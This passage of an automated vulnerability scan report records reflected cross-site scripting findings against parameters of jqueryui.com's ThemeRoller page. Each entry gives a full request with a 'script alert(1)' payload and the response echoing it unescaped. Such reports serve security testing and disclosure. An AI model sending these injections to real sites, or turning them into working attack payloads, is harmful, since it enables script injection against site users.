GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 276ad"><script>alert(1)</script>5df8c0fde9e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTex
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68fa"><script>alert(1)</script>a39040d10a4 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b805c"><script>alert(1)</script>db7f5730f61 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8cda"><script>alert(1)</script>529d59993df was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefau
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ca7"><script>alert(1)</script>19d3cb864a7 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9bd"><script>alert(1)</script>b1d6a495bd5 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTexture
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e01a9"><script>alert(1)</script>9aceb87732b was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31c8"><script>alert(1)</script>fa0c014bb49 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd043"><script>alert(1)</script>ac1313806c7 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3